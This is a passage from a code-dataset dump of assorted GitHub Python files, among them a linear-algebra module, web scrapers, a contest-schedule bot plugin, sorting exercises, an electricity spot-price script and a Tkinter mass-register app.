'col'.\n \"\"\"\n if orientation == \"col\":\n return (Vector(col) for col in zip(*iter(matrix)))\n else: # if orientation == \"row\":\n return (Vector(col) for col in matrix)\n\n\ndef transpose(\n matrix: Matrix,\n) -> Matrix:\n \"\"\"\n Calculate the transpose of a given matrix.\n\n Arguments\n - matrix: The matrix to transpose.\n \"\"\"\n return Matrix(\n (matrix[i, j] for i in range(matrix.shape[0]))\n for j in range(matrix.shape[1])\n )\n\n\n# PRIVATE/PROTECTED METHODS\n\n\ndef _ref(\n matrix: Matrix,\n) -> tuple[Matrix, int]:\n \"\"\"\n Using Gaussian elimination, calculates and returns the row-echelon\n form of a matrix.\n\n Arguments\n - matrix: The matrix to row-reduce.\n \"\"\"\n\n # Adapted from:\n # https://en.wikipedia.org/wiki/Gaussian_elimination\n # #Pseudocode\n\n list_mat = matrix.elements\n lm_shape = matrix.shape\n row_count = lm_shape[0]\n col_count = lm_shape[1]\n pivot_row = 0\n pivot_col = 0\n det_sign = 1\n\n while pivot_row < row_count and pivot_col < col_count:\n max_row = max(\n (\n (abs(list_mat[i][pivot_col]), i)\n for i in range(pivot_row, row_count)\n ),\n key=lambda x: x[0],\n )[1]\n if list_mat[max_row][pivot_col] == Fraction(0):\n pivot_col += 1\n else:\n if max_row != pivot_row:\n list_mat[pivot_row], list_mat[max_row] = (\n list_mat[max_row],\n list_mat[pivot_row],\n )\n det_sign = -det_sign\n for row in range(pivot_row + 1, row_count):\n factor = (\n list_mat[row][pivot_col] / list_mat[pivot_row][pivot_col]\n )\n list_mat[row][pivot_col] = Fraction(0)\n for col in range(pivot_col + 1, col_count):\n list_mat[row][col] -= list_mat[pivot_row][col] * factor\n pivot_row += 1\n pivot_col += 1\n return Matrix(list_mat), det_sign\n\n\ndef _rref(\n matrix: Matrix,\n) -> Matrix:\n \"\"\"\n Using Gauss-Jordan elimination, calculates and returns the\n reduced row-echelon form of a matrix.\n\n Arguments\n - matrix: The matrix to row-reduce.\n \"\"\"\n\n # Adapted from:\n # https://en.wikipedia.org/wiki/Row_echelon_form\n # #Pseudocode_for_reduced_row_echelon_form\n\n list_mat = matrix.elements\n lm_shape = matrix.shape\n lead = 0\n row_count = lm_shape[0]\n col_count = lm_shape[1]\n for row in range(row_count):\n if col_count <= lead:\n return Matrix(list_mat)\n i = row\n while list_mat[i][lead] == Fraction(0):\n i += 1\n if row_count == i:\n i = row\n lead += 1\n if col_count == lead:\n return Matrix(list_mat)\n if i != row:\n list_mat[i], list_mat[row] = list_mat[row], list_mat[i]\n lead_val = list_mat[row][lead]\n for col in range(lm_shape[1]):\n list_mat[row][col] = list_mat[row][col] / lead_val\n for i in range(row_count):\n if i != row:\n lead_val = list_mat[i][lead]\n for col in range(lm_shape[1]):\n list_mat[i][col] = list_mat[i][col] - (\n lead_val * list_mat[row][col]\n )\n lead += 1\n return Matrix(list_mat)\n","repo_name":"B-Roux/momlib","sub_path":"momlib/_linalg.py","file_name":"_linalg.py","file_ext":"py","file_size_in_byte":18731,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"3159274007","text":"\ndef get_from_dict(dictionary, path, default=None):\n path = path.split(':')\n for key in path:\n try:\n dictionary = dictionary[key]\n except KeyError as e:\n if default is not None:\n return default\n raise KeyError(\n f\"config.yaml has not key '{path}' key '{e.args[0]}' is wrong.\")\n return dictionary\n","repo_name":"spannenberger/tsar_pipeline","sub_path":"src/utils/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":382,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"42346682974","text":"import pathlib\n\nfrom selenium import webdriver\n\nurl1 = 'https://www.matsmart.se/proteinprodukter'\nxpathPrice = \"//div[@class='product-item-price']//span[@class='product-price-title']\"\nxpathName = \"//div[@class='product-grid-item-container product-grid-item-label-header']//span[@class='label']\"\nxpathMultiPrice = \"//div[@class='product-item-price']//span[@class='product-item-multi-price-label']\"\n\nxpathShort = \"//div[@class='product-item-price']//div[@property='offers']\"\n\n\nclass matsmartItem:\n def __init__(self, name, price, mult=1):\n self.name = name\n self.price = price\n self.mult = mult\n\n\ndef __CHROMEDRIVER_PATH():\n \"\"\"Calculates the path to Chromedriver.exe. Chromedriver.exe is expected\n to be found as file in the same folder as this file.\n\n Returns:\n [type]: [description]\n \"\"\"\n filepath = pathlib.Path(__file__).parent.absolute()\n CHROMEDRIVER_PATH = str(filepath) + '/chromedriver.exe'\n return CHROMEDRIVER_PATH\n\n\ndef __initWebDriver():\n \"\"\"Returns a configured webdriver\n\n Returns:\n [type]: [description]\n \"\"\"\n driver = webdriver.Chrome(\n executable_path=__CHROMEDRIVER_PATH())\n return driver\n\n\ndef numberOfItems():\n driver = __initWebDriver()\n driver.get(url1)\n elements = driver.find_elements_by_xpath(xpathPrice)\n numberOfItems = len(elements)\n driver.close\n return numberOfItems\n\n\ndef getProducts():\n \"\"\"Returns a list containing all protein-products on matsmart site.\n\n\n Returns:\n [matsmartItem]: List of matsmartItem.\n \"\"\"\n driver1 = __initWebDriver()\n driver1.get(url1)\n\n elementsPrice = driver1.find_elements_by_xpath(xpathPrice)\n elementsName = driver1.find_elements_by_xpath(xpathName)\n elementsMulti = driver1.find_elements_by_xpath(xpathMultiPrice)\n\n reversedMulti = reversed(elementsMulti)\n multiIndexes = getIndexesOfMultiDeal()\n multiValues = getValuesOfMultiDeal()\n multiValues.reverse()\n\n numberOfItems = 0\n\n if(len(elementsName) == len(elementsPrice)):\n numberOfItems = len(elementsName)\n else:\n return ValueError\n\n listOfItems = []\n\n for i in range(numberOfItems):\n itemName = elementsName[i].text\n itemPrice = int(elementsPrice[i].text)\n if(i in multiIndexes):\n item = matsmartItem(itemName, itemPrice, multiValues.pop())\n else:\n item = matsmartItem(itemName, itemPrice)\n listOfItems.append(item)\n\n print(item.name + '\\n' + str(item.price) + '\\n' + str(item.mult))\n\n driver1.close()\n\n return listOfItems\n\n\ndef getNumberOfMultiDeals():\n driver1 = __initWebDriver()\n driver1.get(url1)\n elementsPrice = driver1.find_elements_by_xpath(xpathMultiPrice)\n\n print(len(elementsPrice))\n driver1.close()\n\n\ndef getIndexesOfMultiDeal():\n \"\"\"Returns a list containing the indexes of the multideals\n\n Returns:\n [list]: [description]\n \"\"\"\n driver1 = __initWebDriver()\n driver1.get(url1)\n elements = driver1.find_elements_by_xpath(xpathShort)\n\n listOfIndexes = []\n\n for index, element in enumerate(elements):\n if(\"product-item-multi-price-wrapper\" in element.get_attribute(\"class\")):\n listOfIndexes.append(index)\n driver1.close()\n return listOfIndexes\n\n\ndef getValuesOfMultiDeal():\n \"\"\"Returns a list containing the number of items\n needed for price to be accurate in a multideal\n\n Returns:\n List: List of int's\n \"\"\"\n driver1 = __initWebDriver()\n driver1.get(url1)\n elementsMulti = driver1.find_elements_by_xpath(xpathMultiPrice)\n valueList = []\n for i in elementsMulti:\n valueList.append(int(i.text[0]))\n\n driver1.close()\n return valueList\n","repo_name":"TwixiNature/ppkApi","sub_path":"webscraper/webscrapeMatsmart.py","file_name":"webscrapeMatsmart.py","file_ext":"py","file_size_in_byte":3716,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"35705070289","text":"import time\nimport asyncio\nfrom pyppeteer import launch\n\n# Headless control\n\n# Launch webpage\nasync def launch_page():\n\tbrowser = await launch(headless=False, autoClose=False)\n\tpage = await browser.newPage()\n\tawait page.goto(\"https://www.youtube.com/watch?v=zVA1HfpksJ8\", timeout=100000000000)\n\treturn page\n\n# Click play/stop button\nasync def click_button(page):\n\tawait page.click(\".ytp-play-button.ytp-button\")","repo_name":"yujie-tao/touchless-ui","sub_path":"control.py","file_name":"control.py","file_ext":"py","file_size_in_byte":411,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"37"} +{"seq_id":"5798449151","text":"import asyncio\nimport sys\n\nimport mariadb\nfrom datetime import datetime\nfrom nonebot import logger, require\nfrom src.contests_services import codeforces, atcoder, nowcoder\n\n\ndef get_connect() -> mariadb.connection:\n \"\"\"\n 获取数据库的连接\n :return: 数据库的连接\n \"\"\"\n try:\n conn = mariadb.connect(\n user='bot',\n host='localhost',\n database='bot',\n passwd='robot',\n port=3306\n )\n except mariadb.Error as e:\n print(e)\n sys.exit(-1)\n\n return conn\n\n\nasync def __get_contest__(contest_type: str) -> list:\n \"\"\"\n 爬取各个平台的比赛\n\n 目前支持的平台:\n codeforces\n atcoder\n nowcoder\n\n :param contest_type:\n :return:\n \"\"\"\n if contest_type == 'codeforces':\n return await codeforces.get_contests()\n elif contest_type == 'atcoder':\n return await atcoder.get_contests()\n elif contest_type == 'nowcoder':\n return await nowcoder.get_contests()\n elif contest_type == '':\n s = []\n s.extend(await codeforces.get_contests())\n s.extend(await atcoder.get_contests())\n s.extend(await nowcoder.get_contests())\n return s\n\n return []\n\n\nasync def __update__(typename) -> bool:\n \"\"\"\n 更新比赛\n :param typename: 更新的比赛的类型\n :return:\n \"\"\"\n global connect\n contest = await __get_contest__(typename)\n status = False\n\n if len(contest) == 0:\n logger.warning(f'未获取{typename}最近的比赛')\n return status\n\n try:\n connect = get_connect()\n cur = connect.cursor()\n cur.execute(f\"TRUNCATE TABLE {typename}\")\n\n for x in contest:\n name = x['name']\n link = x['link']\n contest_time = list(map(str, x['contest_time']))\n data = {\n 'name': name,\n 'link': link,\n 'contest_time': contest_time\n }\n cur.execute(f'INSERT INTO {typename} (data) VALUES (\\\"{data}\\\")')\n status = True\n except mariadb.Error as e:\n print(e, file=sys.stderr)\n finally:\n connect.close()\n return status\n\n\nasync def update(typename) -> bool:\n if typename == '':\n return await __update__('codeforces') and \\\n await __update__('atcoder') and \\\n await __update__('nowcoder')\n elif typename == 'codeforces':\n return await __update__('codeforces')\n elif typename == 'atcoder':\n return await __update__('atcoder')\n elif typename == 'nowcoder':\n return await __update__('nowcoder')\n else:\n logger.error('unknown type when update recent contests')\n return False\n\n\nasync def pull_data(typename='') -> list:\n connect = get_connect()\n cur = connect.cursor()\n\n if typename != '':\n cur.execute(f'SELECT data FROM {typename}')\n else:\n cur.execute(f'SELECT data FROM codeforces')\n cur.execute(f'SELECT data FROM atcoder')\n cur.execute(f'SELECT data FROM nowcoder')\n data = []\n for i in cur:\n x = eval(i[0])\n x['contest_time'] = tuple(map(lambda it: datetime.strptime(it, '%Y-%m-%d %H:%M:%S'), x['contest_time']))\n data.append(x)\n connect.close()\n return data\n\n\nscheduler = require(\"nonebot_plugin_apscheduler\").scheduler\n\n\n@scheduler.scheduled_job(\"cron\", id=\"database_update\", hour='3')\nasync def database_update():\n await update('')\n\n\nif __name__ == '__main__':\n asyncio.run(update(''))\nelse:\n logger.info('update the contests data when launching the bot')\n asyncio.run(update(''))\n","repo_name":"FrankOu2001/codeforces_robot","sub_path":"src/contests_services/database.py","file_name":"database.py","file_ext":"py","file_size_in_byte":3636,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"41024682477","text":"from django.urls import path,re_path\nfrom hotel.views import*\nfrom hotel import views\n\nurlpatterns=[\n\t\tpath('roomadding/',Hotel.as_view(),name='roomadding'),\n\t\tpath('roomaddedlist/',HotelDetailList.as_view(),name=\"roomaddedlist\"),\n\t\tre_path(r\"^roomaddeddetail/(?P\\d+)\\$\",HotelDetailView.as_view(),name='roomaddeddetail'),\n\t\tre_path(r\"^roomaddedupdate/(?P\\d+)\\$\",HotelDetailUpdate.as_view(),name='roomaddedupdate'),\n\t\tpath('hotelregister/',views.addhotel, name='hotelregister'),\n \tpath(\"hotelregisterlist/\",HotelRegisterList.as_view(),name=\"hotelregisterlist\"),\n \tre_path(r\"^hotelregisterdetail/(?P\\d+)\\$\",HotelRegisterDetail.as_view(),name='hotelregisterdetail'),\n \tre_path(r\"^HotelRegisterUpdate/(?P\\d+)\\$\",HotelRegisterUpdate.as_view(),name=\"hotelregisterupdate\"),\n \tpath('hotelhome/',HotelHome.as_view(),name=\"hotelhome\"),\n \tpath(\"oderview/\",OrdersView.as_view(),name=\"oderview\"),\n \tpath('hprofile/',HotelProfile.as_view(),name='hprofile')\n\n]\n\n\n\n\n","repo_name":"mohammedarif98/BookmyRooms","sub_path":"hotel/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":984,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"5598348116","text":"#! /usr/bin/env python\n# -*- coding: utf-8 -*-\nimport numpy as np\nfrom .blocks import Blockifier\n\n\nclass IdentityPredictor(object):\n \"\"\"Mock out the machine learning model with an identity model.\"\"\"\n @staticmethod\n def predict(x):\n return x\n\n @staticmethod\n def fit(*args, **kargs):\n pass\n\n\nclass BaselinePredictor(object):\n \"\"\"Always predict content\"\"\"\n @staticmethod\n def predict(x):\n return np.ones(x.shape)\n\n @staticmethod\n def fit(*args, **kwargs):\n pass\n\n\ndef nofeatures(blocks, *args, **kwargs):\n return np.zeros((len(blocks), 1))\n\n\nclass ContentExtractionModel(object):\n \"\"\"Content extraction model\n\n Encapsulates a blockifier, some feature generators and a\n machine learing block model\n\n Implements analyze, make_features\"\"\"\n\n def __init__(self, blockifier, features, block_model, threshold=0.5):\n \"\"\"blockifier = implements blockify\n features = list of things that implement features interface\n block_model = sklearn interface model\"\"\"\n\n self._blockifier = blockifier\n self._features = features\n self._block_model = block_model\n self._threshold = threshold\n\n # check the features\n for f in self._features:\n if not callable(f):\n raise TypeError('All features must be callable')\n\n def set_threshold(self, thres):\n \"\"\"Set the threshold\n\n 0<= thres <= 1.0\"\"\"\n self._threshold = thres\n\n def analyze(self, s, blocks=False, encoding=None, parse_callback=None):\n \"\"\"\n Given an HTML string, extract just its main content or content+comments\n and return it as a string or as a sequence of blocks.\n\n Args:\n s (str): a single HTML document as a string\n blocks (bool): if True, return sequence of ``Block`` objects; if\n False, return combined text from all blocks\n encoding (str): the encoding used for ``s``; if None, the encoding\n is guessed based on the HTML's content\n parse_callback (Callable)\n\n Returns:\n str or List[``Block``]\n \"\"\"\n # blockify html into blocks\n blocks_ = self._blockifier.blockify(\n s, encoding=encoding, parse_callback=parse_callback)\n\n # make features, run model and return content\n return self.analyze_from_blocks(blocks_, return_blocks=blocks)\n\n def analyze_from_blocks(self, blocks, return_blocks=False):\n # make features\n features = self.make_features_from_blocks(blocks)\n\n # run model and select results\n if features is not None:\n content_mask = self._block_model.predict(features) > self._threshold\n results = [ele[0] for ele in zip(blocks, content_mask) if ele[1]]\n else:\n # doc is too short. return all content\n results = blocks\n\n if return_blocks:\n return results\n else:\n return ' '.join(blk.text for blk in results)\n\n def make_features_from_blocks(self, blocks, train=False):\n # doc needs to be at least three blocks, otherwise return everything\n if len(blocks) < 3:\n return None\n # compute the features\n return np.column_stack(tuple(f(blocks, train) for f in self._features))\n\n def make_features(self, s, train=False, encoding=None, parse_callback=None):\n \"\"\"s = HTML string\n return features, blocks\n\n raises BlockifyError if there is an error parsing the doc\n and None if doc is too short (< 3 blocks)\n\n train = if true, then passes it into feature maker\n \"\"\"\n # note: this method is not longer needed by ContentExtractionModel\n # but is kept for now for backward compatibilty with training code\n blocks = self._blockifier.blockify(\n s, encoding=encoding, parse_callback=parse_callback)\n return self.make_features_from_blocks(blocks, train), blocks\n\n @staticmethod\n def plot(blocks, content_mask):\n import pylab as plt\n\n fig = plt.figure(1)\n fig.clf()\n block_lengths = np.array([len(ele.text) for ele in blocks]) - 1.0\n block_lengths_content = block_lengths.copy()\n block_lengths_content[~np.array(content_mask)] = 0.0\n block_lengths_no_content = block_lengths.copy()\n block_lengths_no_content[content_mask] = 0.0\n\n plt.bar(np.arange(len(blocks)), block_lengths_no_content, 0.5)\n plt.bar(np.arange(len(blocks)), block_lengths_content, 0.5)\n\n fig.show()\n\n\nclass ContentCommentsExtractionModel(ContentExtractionModel):\n \"\"\"\n Run two models: a content only and a content + comments model\n on a document and return the output of both\n \"\"\"\n def __init__(self, blockifier, features,\n content_model, content_comments_model, threshold=0.5):\n self._blockifier = blockifier\n self._features = features\n self._content_model = content_model\n self._content_comments_model = content_comments_model\n self._threshold = threshold\n\n # check the features\n for f in self._features:\n if not callable(f):\n raise TypeError('All features must be callable')\n\n def analyze(self, s, blocks=False, encoding=None, parse_callback=None):\n \"\"\"\n Get the content and content+comments\n\n s = HTML string\n if encoding is not None, then this specifies the HTML string encoding.\n If None, then try to guess it.\n parse_callback: if not None then this is callable that is invoked\n with the parse tree\n\n if blocks is False then returns a tuple of strings:\n (main_content_string, main_content_and_comments_string)\n if blocks is True then returns a tuple of block instances:\n (list of main content blocks,\n list of main content and comments blocks)\n \"\"\"\n # just a wrapper around base class method for now\n # all the subclass specific logic is in analyze_from_blocks\n return super(ContentCommentsExtractionModel, self).analyze(\n s, blocks=blocks, encoding=encoding, parse_callback=parse_callback)\n\n def analyze_from_blocks(self, blocks_, return_blocks=False):\n features = self.make_features_from_blocks(blocks_)\n\n if features is not None:\n content_mask = self._content_model.predict(\n features) > self._threshold\n content_comments_mask = self._content_comments_model.predict(\n features) > self._threshold\n blocks_content = [\n ele[0] for ele in zip(blocks_, content_mask) if ele[1]]\n blocks_content_comments = [\n ele[0] for ele in zip(blocks_, content_comments_mask) if ele[1]]\n else:\n # doc is too short. return all content\n blocks_content = blocks_\n blocks_content_comments = blocks_\n\n if return_blocks:\n return (blocks_content, blocks_content_comments)\n else:\n return (\n ' '.join(blk.text for blk in blocks_content),\n ' '.join(blk.text for blk in blocks_content_comments)\n )\n\n\nclass SklearnWrapper(object):\n def __init__(self, skmodel):\n # skmodel implements predict_proba and has classes_ attribute\n self._skmodel = skmodel\n classes = list(skmodel.classes_)\n self._positive_idx = classes.index(1)\n\n def predict(self, X):\n return self._skmodel.predict_proba(X)[:, self._positive_idx]\n\nbaseline_model = ContentExtractionModel(Blockifier, [nofeatures], BaselinePredictor)\n","repo_name":"alexbui91/rubbishornot","sub_path":"dragnet/dragnet/content_extraction_model.py","file_name":"content_extraction_model.py","file_ext":"py","file_size_in_byte":7694,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"10426478549","text":"import sys\n\nn, m = map(int, sys.stdin.readline().split())\nnumber = list(map(int, sys.stdin.readline().split()))\ncheck_list = [False] * n\narr = []\nnumber.sort()\n\n\ndef dfs(cnt):\n if cnt == m:\n print(*arr)\n elif cnt < m:\n for i in range(n):\n if check_list[i]:\n continue\n\n check_list[i] = True\n arr.append(number[i])\n dfs(cnt + 1)\n arr.pop()\n check_list[i] = False\n\n\ndef main():\n dfs(0)\n\n\nmain()","repo_name":"Mighty96/BOJ_Python","sub_path":"Class4/15650.py","file_name":"15650.py","file_ext":"py","file_size_in_byte":495,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"31771485910","text":"import requests\nimport json\nfrom datetime import datetime\nimport spot_price_tomorrow\n\n\n\ndef get_hourly_prices():\n prices = []\n for i in range(len(parse_json)):\n time = parse_json[ i]['DateTime']\n time = simplify(time)\n price = parse_json[i]['PriceWithTax']\n values = { time: price}\n prices.append(values)\n\n return prices\n\ndef get_avg():\n sum = 0\n for count, i in enumerate(range(len(parse_json))):\n info = parse_json[i]['PriceWithTax']\n sum += info\n \n avg = sum / count\n avg = round(avg, 4)\n return avg\n \ndef get_current_price():\n current_time = get_time()\n price_now = parse_json[current_time]['PriceWithTax']\n return price_now\n\ndef is_cheaper():\n avg = get_avg()\n current_price = get_current_price()\n\n if current_price <= avg:\n return True\n else: return False\n\ndef get_next_good_price():\n avg = get_avg()\n upcoming_prices = parse_json[get_time():]\n upcoming_good_prices = []\n for x in range(len(upcoming_prices)):\n if upcoming_prices[x]['PriceWithTax'] <= avg:\n price = simplify(upcoming_prices[x]['DateTime'])\n upcoming_good_prices.append(price)\n return upcoming_good_prices\n\ndef simplify(data):\n # DateTime is in YYYY-MM-DDTHH:MM:SS+TIMEZONE\n # get rid of date \n time_and_date = data.split(\"T\")\n data = time_and_date[-1]\n # get rid of timezone and seconds\n time = ':'.join(data.split(\":\",2)[:2])\n data = time\n\n return data\n\ndef get_time():\n current_time = datetime.now().strftime(\"%H\")\n return int(current_time)\n\ndef compare_prices():\n today_avg = get_avg()\n tomorrow = spot_price_tomorrow.prices_revealed()\n\n print(\"-------------------\")\n print(\"Today's avg \" + str(today_avg))\n\n if(tomorrow):\n tomorrow_avg = spot_price_tomorrow.get_avg()\n print(\"Tomorrow's avg \" + str(tomorrow_avg))\n print(\"-------------------\")\n\n current_price = get_current_price()\n\n\n print(\"Price now: \" +str(current_price))\n if(tomorrow):\n tomorrow_price_same_time = spot_price_tomorrow.get_current_price()\n print(\"Price tomorrow at the same time: \" +str(tomorrow_price_same_time))\n print(\"-------------------\")\n \n upcoming_good_prices_today = get_next_good_price()\n \n for x in range(len(upcoming_good_prices_today)):\n print(\"Upcoming good prices today: \" +str(upcoming_good_prices_today[x]))\n if(tomorrow):\n upcoming_good_prices_tomorrow = spot_price_tomorrow.get_next_good_price()\n for x in range(len(upcoming_good_prices_tomorrow)):\n print(\"Upcoming good prices tomorrow: \" +str(upcoming_good_prices_tomorrow[x]))\n print(\"-------------------\")\n\ndef create_json():\n\n spot_price_json_today = {\n \"avg\" : get_avg(),\n \"current\" : get_current_price(),\n \"hourly\" : get_hourly_prices(),\n \"cheaper_than_avg\" : is_cheaper(),\n \"prices_for_tomorrow\": spot_price_tomorrow.prices_revealed()\n \n }\n\n if spot_price_tomorrow.prices_revealed():\n spot_price_tomorrow_json = {\n \"avg_tomorrow\" : spot_price_tomorrow.get_avg(),\n \"current_tomorrow\" : spot_price_tomorrow.get_current_price(),\n \"hourly_tomorrow\" : spot_price_tomorrow.get_hourly_prices(),\n \"cheaper_than_avg_tomorrow\" : spot_price_tomorrow.is_cheaper(),\n \n }\n\n spot_price_json = {**spot_price_json_today, **spot_price_tomorrow_json}\n spot_price_json = json.dumps(spot_price_json, indent=4)\n \n else:\n spot_price_json = json.dumps(spot_price_json_today, indent=4)\n\n return spot_price_json\n \ndef push_json(data):\n \n with open('../data/price_data.json', 'w') as f:\n f.write(data)\n\n\ndef main():\n \n response_API = requests.get('https://api.spot-hinta.fi/Today')\n #response_API.raise_for_status()\n data = response_API.text\n global parse_json\n parse_json = json.loads(data)\n \n data = create_json()\n push_json(data)\nif __name__ == \"__main__\":\n main()","repo_name":"meekku/eOpt2023","sub_path":"data/spot_price_today.py","file_name":"spot_price_today.py","file_ext":"py","file_size_in_byte":4037,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"1094723219","text":"print(\"*****Selection Sort*****\\n\")\r\nprint(\"1. Sorting In Ascending Order\\n2.Sorting in Descending Order\\n\")\r\ns=input(\"Enter Your Choice:\\n\")\r\niList=list(map(int,input(\"Enter Elements\\n\").split()))\r\nprint(\"Given List:\\n\",iList)\r\n\r\nif s=='1':\r\n for i in range(len(iList)):\r\n minValue=min(iList[i:])\r\n indexMinValue=iList.index(minValue,i)\r\n iList[i],iList[indexMinValue]= iList[indexMinValue],iList[i]\r\nelse:\r\n for i in range(len(iList)):\r\n maxValue=max(iList[i:])\r\n indexMaxValue=iList.index(maxValue,i)\r\n iList[i],iList[indexMaxValue]= iList[indexMaxValue],iList[i]\r\n \r\nprint(\"Sorted List:\\n\",iList)\r\n","repo_name":"NirajPatel07/Algorithms-Python","sub_path":"SelectionSort.py","file_name":"SelectionSort.py","file_ext":"py","file_size_in_byte":653,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"27664706109","text":"from tkinter import *\nfrom tkinter import ttk\nfrom tkinter import messagebox\nimport reportlab\nimport sqlite3\nimport pandas as pd\nimport os, sys, subprocess\n\n\nfrom tkinter import ttk\n#importare prima ttkwidgets\nfrom ttkwidgets.autocomplete import AutocompleteEntry\nfrom ttkwidgets.autocomplete import AutocompleteCombobox\n\n\nfrom openpyxl.styles import Font, Alignment\nfrom openpyxl.styles import Side, Border\n\nfrom openpyxl import styles, formatting\nimport pandas as pd\nimport numpy as np\n\nfrom openpyxl import Workbook\nfrom openpyxl import load_workbook\nfrom openpyxl.styles import NamedStyle, Font, Alignment, Border, Side, PatternFill\nfrom openpyxl.drawing.image import Image\n\nfrom openpyxl.utils.dataframe import dataframe_to_rows\nfrom openpyxl.worksheet.worksheet import Worksheet\n\n# Leggi il file xlsx e trasformalo in dataframe impostando i nomi colonna\nfrom openpyxl.worksheet.worksheet import Worksheet\n\nfrom xlsxwriter.utility import xl_rowcol_to_cell\nfrom pandastable import Table, TableModel, config\n\n######################################################################\n######## FUNZIONE CONNESSIONE AL DATABASE 'database_conti' ###########\n######################################################################\ndef connessione():\n conn = sqlite3.connect('database_messe_orizzontale')\n\n cur = conn.cursor()\n try:\n cur.execute('''CREATE TABLE TABLE_Messe(ID integer not null PRIMARY KEY ,\n Anno integer not null ,\n Mese TEXT not null ,\n Nome_Celebrante TEXT not null ,\n Ad_Mentem integer not null ,\n Binate integer,\n Binate_Concelebrate integer,\n Trinate integer,\n Suffragi_Comunitari integer,\n Suffragi_Personali integer,\n Devozione integer,\n Benefattori integer,\n Pro_Populo integer)''')\n\n except:\n pass\n\n try:\n cur.execute('''CREATE TABLE TABLE_Celebranti(ID integer not null PRIMARY KEY ,\n Celebranti TEXT not null )''')\n except:\n pass\n\n try:\n cur.execute('''CREATE TABLE TABLE_Suffragi(ID integer not null PRIMARY KEY ,\n Anno integer not null ,\n Mese TEXT not null ,\n Suffragi TEXT not null )''')\n except:\n pass\n\n print(conn)\n print('Sei connesso al database_conti')\n conn.commit()\n conn.close()\n\n\nconnessione()\n\n############################\n######## TKINTER ###########\n############################\n\nroot = Tk()\n\n# DEFINISCO le dimensioni della GUI e il TITOLO nella barra superiore\nheight = 950 # altezza\nwidth = 1680 # larghezza\ntop = 0\nleft = (root.winfo_screenwidth() - width) / 2\ngeometry = (\"{}x{}+{}+{}\".format(width, height, int(left), int(top)))\nroot.geometry(geometry)\nroot.resizable(0, 0)\nroot.title('Registro Messe')\n\nforeground_Bianco = '#ffeddb'\nbackground_Blu = 'blue'\n# Label title\ntitle = Label(root, text='Registro Messe', font=('verdana', 40, 'bold'), bg=background_Blu, fg=foreground_Bianco)\ntitle.pack(side=TOP, fill=X)\n\n###################################\n######## TKINTER frames ###########\n###################################\n\n# Frame Combo - Top\nFrame_combo = Frame(root, bd='4', bg=background_Blu, relief=RIDGE)\nFrame_combo.place(x=5, y=73, width=1670, height=60)\n\n# Frame Treeview - treeview right Frame\nFrame_tree = Frame(root, bd='4', bg=background_Blu, relief=RIDGE)\nFrame_tree.place(x=5, y=132, width=1570, height=335)\nFrame_tree_Buttons= Frame(root, bd='4', bg=background_Blu, relief=RIDGE)\nFrame_tree_Buttons.place(x=1575, y=132, width=100, height=335)\n\n\n#\nFrame_pandastable = Frame(root, bd='4', bg=background_Blu, relief=RIDGE)\nFrame_pandastable.place(x=5, y=467, width=1670, height=480)\n\n# Frame Update - update right Frame\nFrame_Suffragi = Frame(Frame_pandastable, bd='4', bg=background_Blu, relief=RIDGE)\nFrame_Suffragi.place(x=0, y=0, width=470, height=473)\n\n\n###############################################\n######## TKINTER ENTRY Frame_combo ############\n###############################################\nEntry_Anno_combo_IntVar = IntVar()\nEntry_Mese_combo_StringVar = StringVar()\nEntry_Nome_Celebrante_combo_StringVar = StringVar()\nEntry_Ad_Mentem_combo_IntVar = IntVar()\nEntry_Binate_combo_IntVar = IntVar()\nEntry_Binate_Conc_combo_IntVar = IntVar()\nEntry_Trinate_combo_IntVar = IntVar()\nEntry_Suffragi_Comunitari_combo_IntVar = IntVar()\nEntry_Suffragi_Personali_combo_IntVar = IntVar()\nEntry_Devozione_combo_IntVar = IntVar()\nEntry_Benefattori_combo_IntVar = IntVar()\nEntry_Pro_Populo_combo_IntVar = IntVar()\n\n\nLabel_TOTALE_Numero_Messe= Label(Frame_combo, text=' ', font=('verdana', 8, 'bold'),\n bg=background_Blu, fg=foreground_Bianco)\nLabel_TOTALE_Numero_Messe.grid(row=2, column=12, columnspan=2, padx=40, pady=10)\n\n\ndef trace_when_Entry_widget_is_updated(self, *args):\n try:\n Label_TOTALE_Numero_Messe.config(text=' ', font=('verdana', 16, 'bold'), bg=background_Blu, fg=foreground_Bianco)\n value = Entry_Ad_Mentem_combo_IntVar.get()+\\\n Entry_Binate_combo_IntVar.get()+\\\n Entry_Binate_Conc_combo_IntVar.get()+\\\n Entry_Trinate_combo_IntVar.get()+\\\n Entry_Suffragi_Comunitari_combo_IntVar.get()+\\\n Entry_Suffragi_Personali_combo_IntVar.get()+\\\n Entry_Devozione_combo_IntVar.get()+\\\n Entry_Benefattori_combo_IntVar.get()+\\\n Entry_Pro_Populo_combo_IntVar.get()\n\n text = \"{}\".format(value) if value else \" \"\n Label_TOTALE_Numero_Messe.config(text=text)\n\n except:\n pass\n\n\nEntry_Anno_combo_IntVar.trace_variable('w', trace_when_Entry_widget_is_updated)\nEntry_Mese_combo_StringVar.trace_variable('w', trace_when_Entry_widget_is_updated)\nEntry_Nome_Celebrante_combo_StringVar.trace_variable('w', trace_when_Entry_widget_is_updated)\nEntry_Ad_Mentem_combo_IntVar.trace_variable('w', trace_when_Entry_widget_is_updated)\nEntry_Binate_combo_IntVar.trace_variable('w', trace_when_Entry_widget_is_updated)\nEntry_Binate_Conc_combo_IntVar.trace_variable('w', trace_when_Entry_widget_is_updated)\nEntry_Trinate_combo_IntVar.trace_variable('w', trace_when_Entry_widget_is_updated)\nEntry_Suffragi_Comunitari_combo_IntVar.trace_variable('w', 